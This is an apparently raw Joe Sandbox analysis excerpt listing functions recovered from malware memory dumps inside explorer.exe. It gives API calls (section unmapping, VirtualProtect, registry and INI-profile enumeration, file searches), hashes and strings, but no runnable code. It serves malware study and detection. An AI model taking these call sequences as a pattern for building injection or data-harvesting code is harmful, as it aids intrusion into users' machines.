                                                                                                                            • Instruction ID: f65f66478411c5a30da96e8da76500503f47576693cb7129d2fa4bf040d2f09a
                                                                                                                            • Opcode Fuzzy Hash: 97af279c2d3804047e0bd8858d8159460829083da4cc68962119c53b59c02ce3
                                                                                                                            • Instruction Fuzzy Hash: 43D1D4B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            APIs
                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 004318A7
                                                                                                                            • GlobalLock.KERNEL32(WKC), ref: 004318B6
                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 004318F4
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 004318E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                            • String ID: WKC$WKC
                                                                                                                            • API String ID: 1688112647-3140048585
                                                                                                                            • Opcode ID: 1d22d5d5478b83f0fdff3844e1a2c4e626e23c9d4619cca733e48b5e072cc252
                                                                                                                            • Instruction ID: 7525745a592cff04bb66f342c8db3ccb825f9ae214f79ea4535953fc20bf22af
                                                                                                                            • Opcode Fuzzy Hash: 1d22d5d5478b83f0fdff3844e1a2c4e626e23c9d4619cca733e48b5e072cc252
                                                                                                                            • Instruction Fuzzy Hash: 4F016275200305AF8B05AF659C5895F7BAAEF89351F00943FF45587220DF35C9049B2C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 10305aa36b1c071c6c467686070300f508ce3241da45867cc522aabced06c491
                                                                                                                            • Instruction ID: 39e921818d2e88f17f8256ef3668f711ed16cbe4d2bfdfcb396a372aec83c3c6
                                                                                                                            • Opcode Fuzzy Hash: 10305aa36b1c071c6c467686070300f508ce3241da45867cc522aabced06c491
                                                                                                                            • Instruction Fuzzy Hash: 9FE105B060C3829BD7359B29849072FBBE1AF9D308F28695FF8C187351D66CC945DB4A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: aa32ddaad034fb0f217a98675b6513c3c8f0c15088df3246c2f97236adfcca4f
                                                                                                                            • Instruction ID: a928ff4672b33a3a9f2cf654076b7f16aaa1c6452af4b9eb690f14296d2eeb2d
                                                                                                                            • Opcode Fuzzy Hash: aa32ddaad034fb0f217a98675b6513c3c8f0c15088df3246c2f97236adfcca4f
                                                                                                                            • Instruction Fuzzy Hash: ADE1D3B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 28c1f284833e66dc7a91f0746f8eb8a0878a2c47dbf5dbcd9529e2bcec026d23
                                                                                                                            • Instruction ID: 8e69d605a3f5b173155716d5f1ad50ec7cb78bcdf763cd29427aeaeeb47365b0
                                                                                                                            • Opcode Fuzzy Hash: 28c1f284833e66dc7a91f0746f8eb8a0878a2c47dbf5dbcd9529e2bcec026d23
                                                                                                                            • Instruction Fuzzy Hash: 54E1D3B160C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 7763158076e5aca87e28af77ade785d3738ea161c86f3fefbfbbe4e182a524fa
                                                                                                                            • Instruction ID: dd2f05f64b78950f6a733d54b73290af2116eae022f149f3b32548ce841516a8
                                                                                                                            • Opcode Fuzzy Hash: 7763158076e5aca87e28af77ade785d3738ea161c86f3fefbfbbe4e182a524fa
                                                                                                                            • Instruction Fuzzy Hash: 06E1B2B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C197351D66CC945DB4A
                                                                                                                            APIs
                                                                                                                            • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0043720E
                                                                                                                            • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00437226
                                                                                                                            • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0043727B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aulldvrm$_aullrem
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 105165338-3447725786
                                                                                                                            • Opcode ID: 096c3927a0dcef46170d7161251a23ac31173805debc96ef39090b505a2302eb
                                                                                                                            • Instruction ID: dbaf88c407e1702e7c4efc971adcea22c0ac35a3c1beb7745d639d541234641f
                                                                                                                            • Opcode Fuzzy Hash: 096c3927a0dcef46170d7161251a23ac31173805debc96ef39090b505a2302eb
                                                                                                                            • Instruction Fuzzy Hash: B5D1D4B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            APIs
                                                                                                                            • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00438AAD
                                                                                                                            • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00438B66
                                                                                                                            • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00438C9B
                                                                                                                            • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00438CAE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _allmul$_alldvrm
                                                                                                                            • String ID: .
                                                                                                                            • API String ID: 115548886-248832578
                                                                                                                            • Opcode ID: a4d7c323909f77d99f55f4f3b0672e8644958cd9d53626777b43799e005c506a
                                                                                                                            • Instruction ID: 6a09bf593fe9d1a3a4356a28bb3c38b68a4271bbe95951f404997e271f8d98b7
                                                                                                                            • Opcode Fuzzy Hash: a4d7c323909f77d99f55f4f3b0672e8644958cd9d53626777b43799e005c506a
                                                                                                                            • Instruction Fuzzy Hash: CED1D4B190C7858BC7209F59848022EFBF0BBD9714F042D6FF6D596381DBB98945878E
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: ,$7$9
                                                                                                                            • API String ID: 2221118986-1653249994
                                                                                                                            • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                            • Instruction ID: 6fc4edab92ee2027378d69f2c36bec02763afb07156ef030dfc09002926193fb
                                                                                                                            • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                            • Instruction Fuzzy Hash: 9B316A715083449FD330DF65D880B8FBBE8AF85344F00892EF98997252EB75964DCBA6
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(00000000,00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431BCC
                                                                                                                            • StrStrIW.SHLWAPI(00000000,.exe,?,00432E75,PathToExe,00000000,00000000), ref: 00431BF0
                                                                                                                            • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00432E75,PathToExe,00000000,00000000), ref: 00431C05
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431C1C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: .exe
                                                                                                                            • API String ID: 1659193697-4119554291
                                                                                                                            • Opcode ID: 1d2a52696441565f80e0cc015aa8a9b6b42907ee8e42d775b2058dc40d95ad83
                                                                                                                            • Instruction ID: 9b5600007c349b2f8bce4788b6f6217ad8dddede415e52dc22e79e0342253b2f
                                                                                                                            • Opcode Fuzzy Hash: 1d2a52696441565f80e0cc015aa8a9b6b42907ee8e42d775b2058dc40d95ad83
                                                                                                                            • Instruction Fuzzy Hash: 96F0C2303502209AD7646F34AC49BBF62A5EF0A341F216C3FE142C32B1EB688C41C75D
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00432127
                                                                                                                            • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0043213A
• wsprintfA.USER32 ref: 0043214F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
• String ID: %li
• API String ID: 4120667308-1021419598
• Opcode ID: 6772bf3a1b987ec87112f25cfc2adbe67ddbda376e5ccd15da4d22cece3ac70b
• Instruction ID: 0e14907fd1ba5cdf3bceadad3492b57d57820c77779278f38477792ad8a9fc86
• Opcode Fuzzy Hash: 6772bf3a1b987ec87112f25cfc2adbe67ddbda376e5ccd15da4d22cece3ac70b
• Instruction Fuzzy Hash: D8E0D832A4020877C7203BB89D0AFEF7B6CDB40B59F00059AF900E6192E5764A2483D9
APIs
• _allmul.NTDLL(?,00000000,00000018), ref: 0044316F
• _allmul.NTDLL(-00000001,00000000,?,?), ref: 004431D2
• _alldiv.NTDLL(?,?,00000000), ref: 004432DE
• _allmul.NTDLL(00000000,?,00000000), ref: 004432E7
• _allmul.NTDLL(?,00000000,?,?), ref: 00443392
  • Part of subcall function 004416CD: memset.NTDLL ref: 0044172B
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: _allmul$_alldivmemset
• String ID:
• API String ID: 3880648599-0
• Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction ID: b7ecfb7da435fb73dbdb7ab9a6af29a089ba2ec26a84b2415c41fa596d5ae6c0
• Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
• Instruction Fuzzy Hash: 22D18C706083418BEB24DF69C480B6FB7E1AF88B09F14492EF99587351DB78DE45CB4A
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID:
• String ID: FOREIGN KEY constraint failed$new$old
• API String ID: 0-384346570
• Opcode ID: c45c552f718e5e0b722c544f867c3853ba73f9e7c672d56929e53d0fd7b2b667
• Instruction ID: 327ac3d76bcfd9dcd70760d421060b4fff6f850114040e8ddabeed9ef8a9e838
• Opcode Fuzzy Hash: c45c552f718e5e0b722c544f867c3853ba73f9e7c672d56929e53d0fd7b2b667
• Instruction Fuzzy Hash: 67D128706083009FD714EF25C481A2FBBE9AB88754F104A1EF9458B392EB78D945CB97
APIs
• _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 004396E7
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 00439707
• _alldiv.NTDLL(00000000,80000000,?,?), ref: 00439739
• _alldiv.NTDLL(00000001,80000000,?,?), ref: 0043976C
• _allmul.NTDLL(?,?,?,?), ref: 00439798
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: _alldiv$_allmul
• String ID:
• API String ID: 4215241517-0
• Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction ID: 35c8896b2277323423878264867ca7641e395e0bce6ff9b4e5b3aa053d426f74
• Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
• Instruction Fuzzy Hash: A52126315157159AD7347D1A4DC1B2B3688DB9D7A4F24252FFC12C23C1EBDE8C4081AD
APIs
• _allmul.NTDLL(?,00000000,00000000), ref: 0044B1B3
• _alldvrm.NTDLL(?,?,00000000), ref: 0044B20F
• _allrem.NTDLL(?,00000000,?,?), ref: 0044B28A
• memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0044B298
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: _alldvrm_allmul_allremmemcpy
• String ID:
• API String ID: 1484705121-0
• Opcode ID: abdba188e4bfdf281b7d79c9056e3e56b74dba4e99a21b9df24c58c4e894ef3f
• Instruction ID: a0ee92632411bc9e7452e646c9b339bbdcb7ecca234928ee30fc64d4146b0234
• Opcode Fuzzy Hash: abdba188e4bfdf281b7d79c9056e3e56b74dba4e99a21b9df24c58c4e894ef3f
• Instruction Fuzzy Hash: AF4114756083019BD714EF26C89192BBBE5FFC8344F04492EF98587262DB74EC05CB96
APIs
• lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
• lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
• lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
• lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: feb388e6100d38c244564bdfba5f14a062c5c0727ec1a39287f7831c28697468
• Instruction ID: 1e8b991b873dfcea3ae4f89fee4cc70d5fc901527b7d36e475a29a4e66d313d7
• Opcode Fuzzy Hash: feb388e6100d38c244564bdfba5f14a062c5c0727ec1a39287f7831c28697468
• Instruction Fuzzy Hash: C2E065A230021C1B5714B7AE5C94E7B769DCEC96A5706003AFA08D3312EA5A9C0586B8
APIs
  • Part of subcall function 00436A81: memset.NTDLL ref: 00436A9C
• _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0045F2A1
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: _aulldivmemset
• String ID: %llu$%llu
• API String ID: 714058258-4283164361
• Opcode ID: 682599454c5ee9a2cd7c415bff8bd5edcf886b90b7da4f536ec8acc88d1a9ae9
• Instruction ID: df38bbfaa897e6c9689a5748fa0e31993056f716ec101296dae6eca0383ca954
• Opcode Fuzzy Hash: 682599454c5ee9a2cd7c415bff8bd5edcf886b90b7da4f536ec8acc88d1a9ae9
• Instruction Fuzzy Hash: 232104B26446057BC710BA25CC42F6BB758AF85734F04462EF921972C2DB299C1987EA
APIs
• _allmul.NTDLL(?,00000000,?), ref: 00442174
• _allmul.NTDLL(?,?,?,00000000), ref: 0044220E
• _allmul.NTDLL(?,00000000,00000000,?), ref: 00442241
• _allmul.NTDLL(00432E26,00000000,?,?), ref: 00442295
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: _allmul
• String ID:
• API String ID: 4029198491-0
• Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
• Instruction ID: aaff03d1e0c2bb7b9110d01d178244181c9295e5fcfa9b510e8154832b7c6e2e
• Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
• Instruction Fuzzy Hash: 70A19E703087019BE714EF65C581A2FB7E5AFC8704F40482EFA558B361EBB8EC458B4A
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: memcpymemset
• String ID:
• API String ID: 1297977491-0
• Opcode ID: e9d3cd6ba3f5b9bd65a077e508ec56a81bb732b577464c95d209073f0cba1626
• Instruction ID: b5638a30730b19529b5d1a5f34db7cf7e4bd1ab6a501865ed145ebfc92faffbe
• Opcode Fuzzy Hash: e9d3cd6ba3f5b9bd65a077e508ec56a81bb732b577464c95d209073f0cba1626
• Instruction Fuzzy Hash: 1E819FB16083549FE310DF29C980A2BBBE5EF88704F14496EF88597352D778ED06CB96
APIs
• lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
• lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
• lstrcat.KERNEL32(00000000,?), ref: 00431946
• lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
Memory Dump Source
• Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_431000_explorer.jbxd
Similarity
• API ID: lstrcatlstrlen
• String ID:
• API String ID: 1475610065-0
• Opcode ID: a9e7e89dc03f76edb80b088144d5234a0126788cef72a077485408e925d148e8
• Instruction ID: 970ecc53e4bbb71f5ef02366fbb50e69e542ac26b33414ca77f385544e2d586a
• Opcode Fuzzy Hash: a9e7e89dc03f76edb80b088144d5234a0126788cef72a077485408e925d148e8
• Instruction Fuzzy Hash: 62E09BA230021C1B472077AE5C94E7F76DCCED95A5706003AFD04C3312EF599C0187B8

Execution Graph

Execution Coverage: 21.8%
Dynamic/Decrypted Code Coverage: 86.8%
Signature Coverage: 0%
Total number of Nodes: 182
Total number of Limit Nodes: 16

Callgraph

[Rendered callgraph (executed / not executed functions) not reproduced]

Control-flow Graph

[Rendered control-flow graph of function e330a8 not reproduced]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: Find$File$CloseFirstNext
• String ID:
• API String ID: 3541575487-0
• Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction ID: 3bcd9b6ca59de655fc9a96e9267729c3ef7a473fa059a62549125bc0fc90aa98
• Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
• Instruction Fuzzy Hash: C4418130318B0C4FDB98EB38984DBAA7BD2FBD8340F445A6DA54AD3151EE78D904C781

Control-flow Graph

[Rendered control-flow graph of function e338b0 not reproduced]
APIs
• NtUnmapViewOfSection.NTDLL ref: 00E338F2
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: SectionUnmapView
• String ID:
• API String ID: 498011366-0
• Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction ID: 0578d2d95a472eb133859a6107703074cd49a265bedbb53fea97907aa406c2cf
• Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
• Instruction Fuzzy Hash: 5CF0E520F11A080BEF6C77BD685D3382AC0EB98315F50192DB515E76D6DC3D8E45C301

Control-flow Graph

APIs
• RegOpenKeyExW.KERNELBASE ref: 00E327C7
• RegQueryValueExW.KERNELBASE ref: 00E327F4
• RegQueryValueExW.KERNELBASE ref: 00E3283A
• RegCloseKey.KERNELBASE ref: 00E32860
  • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: QueryValue$CloseFreeHeapOpen
• String ID:
• API String ID: 1641618270-0
• Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction ID: ff3f2fec8b7a16efcd8f638360ab98fbe74e56253578f9b83725aee12899f7d9
• Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
• Instruction Fuzzy Hash: 7E319230208B488FE768DB28D45877A7BE0FBA8359F54162EE5CAD2264DF24C846C742

Control-flow Graph

[Rendered control-flow graph of function e3372c not reproduced]
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: CloseCreate
• String ID: ?
• API String ID: 2932200918-1684325040
• Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction ID: 096f1d2894aec097c300cd77060c3be93892cc92c80c9f7dcefe946a61f8e9cb
• Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
• Instruction Fuzzy Hash: 41119370608B488FD754DF29D48C66ABBE1FB98345F40062FE48AD3220DF389985CB82

Control-flow Graph

[Rendered control-flow graph of function e3a298 not reproduced]
APIs
• LoadLibraryA.KERNELBASE ref: 00E3A397
• VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00E3A441
• VirtualProtect.KERNELBASE ref: 00E3A45F
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E39000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E39000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e39000_explorer.jbxd
Similarity
• API ID: ProtectVirtual$LibraryLoad
• String ID:
• API String ID: 895956442-0
• Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction ID: e249d0b7ac10297db3e34c8d9ed7f7fa8b9b0732580829125a1b9cc9a1a37279
• Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
• Instruction Fuzzy Hash: A051583235891D4BCB24AA7898CC2F9BBD1F755325F1C163AC4DAD3294D959D8C6C382

Control-flow Graph

[Rendered control-flow graph of function e33254 not reproduced]
APIs
  • Part of subcall function 00E3298C: GetFileAttributesW.KERNELBASE ref: 00E3299E
• GetPrivateProfileSectionNamesW.KERNEL32 ref: 00E3330F
• GetPrivateProfileStringW.KERNEL32 ref: 00E3336F
• GetPrivateProfileIntW.KERNEL32 ref: 00E3338C
  • Part of subcall function 00E330A8: FindFirstFileW.KERNELBASE ref: 00E33104
  • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
• String ID:
• API String ID: 970345848-0
• Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction ID: 93f65980e6788749cafeb8cf8ded26cf0c4879a6f50a47799246e26d2a9e0759
• Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
• Instruction Fuzzy Hash: 9D51D830718F094FDB1DBB3CA85EA797AD2EB98340F4455ADE40AD3292EE64DD41C386

Control-flow Graph

APIs
• StrStrIW.KERNELBASE ref: 00E3347E
• RegOpenKeyExW.KERNELBASE ref: 00E3353F
• RegEnumKeyExW.KERNELBASE ref: 00E335D6
  • Part of subcall function 00E32774: RegOpenKeyExW.KERNELBASE ref: 00E327C7
  • Part of subcall function 00E32774: RegQueryValueExW.KERNELBASE ref: 00E327F4
  • Part of subcall function 00E32774: RegQueryValueExW.KERNELBASE ref: 00E3283A
  • Part of subcall function 00E32774: RegCloseKey.KERNELBASE ref: 00E32860
  • Part of subcall function 00E33254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00E3330F
  • Part of subcall function 00E31860: RtlFreeHeap.NTDLL ref: 00E31880
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
• String ID:
• API String ID: 1841478724-0
• Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction ID: 1ea37593c9d1f63b5ab46381f230dc66c8e4ae67c529af3dee4e3c51fbc96780
• Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
• Instruction Fuzzy Hash: 5D414930718B084FDB98EF7D949972ABAE2FB98341F00566EA18ED3261DE34D944C742

Control-flow Graph

[Rendered control-flow graph of function e32938 not reproduced]
APIs
Memory Dump Source
• Source File: 0000000F.00000002.3175037828.0000000000E31000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E31000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_e31000_explorer.jbxd
Similarity
• API ID: CloseCreateFileHandle
• String ID:
• API String ID: 3498533004-0
• Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
• Instruction ID: 54d0515a5100fd1398a1745b155ec05ca938682d9148d8d99a5d7ba71d4e2786
• Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
